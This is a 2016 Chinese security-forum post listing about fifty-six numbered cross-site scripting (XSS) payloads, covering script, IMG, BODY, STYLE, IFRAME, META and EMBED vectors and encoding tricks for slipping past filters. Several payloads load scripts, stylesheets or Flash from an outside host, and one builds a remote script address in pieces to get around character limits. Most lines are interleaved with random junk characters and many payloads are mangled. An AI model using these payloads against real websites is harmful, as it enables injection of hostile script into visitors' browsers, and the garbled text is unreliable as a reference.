找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2458|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2016-4-28 10:06:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
(1)普通的XSS JavaScript注入
; a* b5 N3 U* f+ H2 i) d
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) N3 [7 I" h) n% Q
(99)另类弹框
! B: Z6 l; Y% T8 [- Q+ z
<q/oncut=alert()>1
# N/ ^/ g, N* {6 k+ s3 y<s/onclick=alert()>b! o8 A) s+ J$ m- ?
<XSS=" onclick="alert(1)//">clickme</SSX=">
1 j# R. c/ L! j$ ]; }: l0 ? <zzz onclick=alert`1`>clickme</zzz>
; z# b9 A- T3 \, s7 o3 L  X <a onclick=alert`1`>clickme</a>
! b# X% [6 ~2 c' P+ T5 \<a=">clickme</a=">9 ?: o! R4 D& g' _2 g
<a=">clickme</a>
/ ^( W+ \, Z5 m& G! R" ?<z=">clickme</z=">
0 j  \8 a: z4 v+ {; d# m<z onclick=alert`1`>clickme</z>
) v1 e" I" |6 I8 l0 V: T$ l& L( t9 f6 d' N2 t/ N
(2)IMG标签XSS使用JavaScript命令
) r& M. L8 [" ~/ L7 i" `0 o; f0 P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: b1 Q  K% b2 E- q- y- d
# Y# x5 H: }& p
(3)IMG标签无分号无引号
5 P$ j- R9 w- c) ]3 }* K0 \* F
<IMG SRC=javascript:alert(‘XSS’)>1 C( _4 h6 R6 U3 [' w/ }4 x$ t: N

7 C' Q) d9 r9 g$ A2 M$ y4 a
(4)IMG标签大小写不敏感0 B+ Y( z. @& s' c0 ?
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ o2 Z0 ?# {$ F

, b2 g: t% ?7 ?
(5)HTML编码(必须有分号)
. b/ E( _- C+ _9 J* b( b' c$ ~
<IMG SRC=javascript:alert(“XSS”)>) k- i6 ^( n: ?
% A+ t( g% m; N7 r, d
(6)修正缺陷IMG标签
4 f6 H$ C7 ]9 C& n% p5 e& n
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>8 p1 P+ [/ {$ Z$ ^
2 }! y5 ]: \( U& S! e
(7)formCharCode标签(计算器)) x1 ]% e" Z$ b2 W7 m
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>4 }/ M$ `5 G5 q9 [: z6 R
6 Z; X' x0 c2 P
(8)UTF-8的Unicode编码(计算器), c% H1 n1 h  [8 }8 J* m0 N
<IMG SRC=jav..省略..S')>, z' o8 _  J0 m  z! A
& y$ n# V6 j3 ]* z0 @, D& i$ @; h) V
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)( x+ Z4 Q% i. o; D+ V
<IMG SRC=jav..省略..S')>
! w+ `/ e7 t: L/ A5 J% O
4 X" m- k1 J: Z" b$ @  J, [
(10)十六进制编码也是没有分号(计算器)
! ]( d) @$ [4 \. Q+ V  ^& Q' `9 t
<IMG SRC=\'#\'" /span>4 i) s* r! J9 c; W* a( h& j, H/ N
+ n. b) f' @; z% j3 Z# ]" b/ T
(11)嵌入式标签,将Javascript分开* b' T( g2 W+ y- K" h. J
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>! `* M# z4 _+ C

6 S- e, x" ~4 q$ `0 a0 l! G* w" _(12)嵌入式编码标签,将Javascript分开
6 I. P  U1 r6 N+ S<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>( [1 k' @  y& F2 b) r6 c( T1 R
& J  g" I& n* B& g- S
(13)嵌入式换行符% t+ X  f* k) K% @+ S
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 D  N! n( k2 u9 _: f! F( y+ U2 A+ a- \" F
(14)嵌入式回车
# b8 w/ i  K( }, F& k: F<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ H( u8 k4 k' A6 d
7 t$ ^: \: C1 M# g(15)嵌入式多行注入JavaScript,这是XSS极端的例子. ^& T! a" c4 a. V# h3 g
<IMG SRC=\'#\'" /span>
) K6 B% ?. F# B/ _+ Y) R4 H' m2 \. [8 ~% {# h; ^9 m
(16)解决限制字符(要求同页面)
; `. _; H0 [& m# ]<script>z=’document.’</script>
7 X: {3 C( ^/ s& g: t& i- B; }<script>z=z+’write(“‘</script>8 A$ A% w7 c" G6 S0 j3 k0 K
<script>z=z+’<script’</script>
2 R+ S/ X  P3 N- d1 a<script>z=z+’ src=ht’</script>1 _8 ~5 u' ^! g$ M& S7 P' ]; ^
<script>z=z+’tp://ww’</script>' J) q1 K& c: W& ]/ H6 p- Z# \* j
<script>z=z+’w.shell’</script>" P; {0 ^5 b$ m; Y* b: ?! n. L, l3 M
<script>z=z+’.net/1.’</script>
& i$ h+ a# J& O5 K& v<script>z=z+’js></sc’</script>0 U- [1 k  C3 C6 g2 `5 N6 A$ V) w* ?
<script>z=z+’ript>”)’</script>
- I. G1 u% A; I" W<script>eval_r(z)</script>; s! o8 X' J+ T: s
6 C5 G' Z9 n* Y. r6 \2 K* A
(17)空字符+ v& x1 O0 g5 _+ q/ k) `
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
9 @3 u7 E' ~5 k
4 w# H. }7 p$ H* s$ n1 |" a/ \3 R9 M7 P(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
1 b8 ^6 v1 _) u% x% B1 L; Lperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
  C4 w( M  K. V  f4 K3 {# W
7 P) z8 }+ {, b/ H& n  n: n: i! {(19)Spaces和meta前的IMG标签
+ G# Z" h+ }/ q2 t<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
0 c" y; M, ]) B6 [0 F0 v
7 k8 }- ]1 r3 E+ h(20)Non-alpha-non-digit XSS
" a1 ?- a/ K3 M, u# a<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT># f$ A; V7 C& d$ E2 e3 E
5 r8 @6 r/ T0 H  d4 k
(21)Non-alpha-non-digit XSS to 26 G( p: L* ~  R& P8 x
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
/ W/ ~$ F; ?7 [7 S; u1 y% O* |% p1 G5 o. j, _. c* A
(22)Non-alpha-non-digit XSS to 3
2 ~* U  N5 N% U+ l2 F! h<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
# d+ u) {" v+ ^! O& C* `8 ~/ W, F+ \& R4 V6 W
(23)双开括号: ~( ?& G9 q) p% V$ c) \; u
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: T3 y2 I$ h" K- z6 }- W- t; }% O2 j" ?; `* D  P' K) A
(24)无结束脚本标记(仅火狐等浏览器)0 r- N9 K7 g4 t) e8 m; _" v
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>2 k3 b0 p9 k/ R7 p+ C6 E1 k

& m6 D& W/ c" ~( J% n9 O* M(25)无结束脚本标记2# |  M% ^: y5 e" q+ U$ C* Q
<SCRIPT SRC=//3w.org/XSS/xss.js>  {! D& x5 \$ Y
4 n. e7 V  U) }
(26)半开的HTML/JavaScript XSS1 \- v5 M+ y& _
<IMG SRC=\'#\'" /span>
6 _8 d3 X" P+ x( w9 B+ J! C  P4 u8 _/ r& r8 B: W$ Y# Z! ]
(27)双开角括号
& ~+ [7 ^6 c8 d<iframe src=http://3w.org/XSS.html <1 @' y% \8 y& ]3 X0 U5 W& ^/ `
: H7 l+ m% X+ |7 a* s0 {9 Q0 T
(28)无单引号 双引号 分号
6 k# S! q2 K' g5 q) x# K' \<SCRIPT>a=/XSS/
' C3 J. r, c5 O' T0 R* balert(a.source)</SCRIPT>
: E- @- n3 Q  Z
4 @- P6 ]4 u. i" M6 X(29)换码过滤的JavaScript
8 |/ o* r$ t5 @2 _# [1 p\”;alert(‘XSS’);//
1 M" ~! L2 e" L. P4 H( V  Q
  L, W4 q  F$ k! Y, P(30)结束Title标签! Q$ b  j' c- z# [- }2 Q6 t; S
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>+ ^; Z7 ]! T5 y1 x! l6 ?

& v  K* q! A5 D(31)Input Image* K1 ?0 z' O: g3 Z9 O& t0 D4 Q" q
<INPUT SRC=\'#\'" /span>8 W6 c) l; J9 f8 m: V

* q7 s0 s4 E/ j; l: b; b0 l(32)BODY Image
9 ~) a, |: \9 C* b<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 m2 w& n4 I1 m! V
% e* C1 t4 {8 S6 `$ z
(33)BODY标签. Z  ^; k# V1 h# ?$ A
<BODY(‘XSS’)># h, E5 r. ~: ~; o. \
% m2 ]# f4 W, @; W9 }! q( ]7 P
(34)IMG Dynsrc$ y% G) {- w+ Z4 R& }1 `  z: m1 u# n
<IMG DYNSRC=\'#\'" /span>) C  S/ J+ J7 X4 c* C+ w  f4 a; b

# j. B9 y( C7 P. v3 |3 Q0 \9 D(35)IMG Lowsrc1 t" \- o1 h% V3 g9 ]) r) j$ [
<IMG LOWSRC=\'#\'" /span>
2 c& {! H( T" }/ t! Q& m% S5 W7 m8 l2 _2 i# S! N4 H, g  Q  c: P
(36)BGSOUND
- E( M, O+ K2 a5 A<BGSOUND SRC=\'#\'" /span>4 p" R# _4 Y: T

: k. K% o$ e7 V+ \& ](37)STYLE sheet( n8 w: {3 o& o8 C
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
' B1 v9 Z2 M& B+ B
0 D6 B/ \$ G3 f5 b9 |+ ](38)远程样式表
5 P' J0 E% c% Z) n# C  Y* w<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! {8 [7 Q. z6 N) }  ?; r% h$ ^' t8 q  U: ?, G
(39)List-style-image(列表式)
( S/ ^, c! W3 n: `' d7 m<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
0 M: R7 @+ ?' o" ?: [) s
# b7 R8 I" K# m, w4 a- B(40)IMG VBscript9 Y7 J0 ]6 Y- h' U
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
  C1 K8 D6 j, G- a4 K2 J  h0 Y; V" A9 S. ?: |1 p& s5 B$ ^1 F3 S6 N! ~
(41)META链接url
* d' t% F' ?9 Q* g( s4 ]<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
+ S: R9 p0 V4 v) ]/ @- b* n5 S
9 y" q7 b; X( g8 z(42)Iframe
- g! }4 \7 {- l, z. p8 {# d# v<IFRAME SRC=\'#\'" /IFRAME>
3 s, P0 k8 _7 @7 G# B) `% N  r/ Q/ A) q; M+ l/ [
(43)Frame
1 _1 q+ J! v- f2 ^<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
. s/ L6 h% W7 ~& l% G6 g1 F3 F& J) n% F$ C" W$ w. a# Y
(44)Table& |  z- L3 |; Q- M8 A( R! y
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ B  q3 a( k( V
- k- @! j* o* R(45)TD
9 ]) A, t! C' [6 u<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>  N4 ~6 B+ v8 P9 n! R. m
- e& D" f( B7 m) e& F* b6 B+ t
(46)DIV background-image
. O5 D' P* h5 }" s<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 }. V) ]  k' M' \( o" a
* ~9 @( U. m' E; _7 j( [(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)6 ~  o+ S4 m$ l, o& Q, |( j5 X! x8 l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- V# n7 ]( t+ ~6 q/ Y  }/ R" Z' D1 b
(48)DIV expression
3 k7 @" L  p! e, G5 G2 i# v<DIV STYLE=”width: expression_r(alert(‘XSS’));”>1 Y2 S. @: H) |

2 s; ?1 H4 U/ \(49)STYLE属性分拆表达
! m, G4 ~- t; C6 s: }/ u5 |<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>% j4 [8 b% C; h9 j3 f9 W
7 d4 X* y- C; Y( v1 r
(50)匿名STYLE(组成:开角号和一个字母开头)$ J( T6 R7 ]5 P, q
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 v1 i& C& ^( J& O7 v$ s. c1 s6 Z: t
(51)STYLE background-image  T! c7 @2 E3 A8 U/ Y5 p
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>$ y, g3 s; Z+ O4 m- H8 J

. }0 s7 L+ H6 X1 L4 Z2 [/ b(52)IMG STYLE方式* b* z! t: N( P" K7 y0 r3 N/ i
exppression(alert(“XSS”))’>  y1 D8 n  U1 \

4 H7 T; o# o5 T9 Z' D! D" O(53)STYLE background
/ ?/ a; ]. n7 h0 Y+ L4 g<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
) e1 C  G; }& l
! B9 D6 P, Y: x7 E2 f8 P7 f  N(54)BASE. u/ |% }7 z/ F! p7 L! i
<BASE HREF=”javascript:alert(‘XSS’);//”>/ ^) b9 i" ]+ i
8 P. L+ ~" Y: g* y0 d! {
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
& ?$ H: P1 I3 e/ j* p) q<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>

' g$ D+ G( Y0 f9 r: X+ C3 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表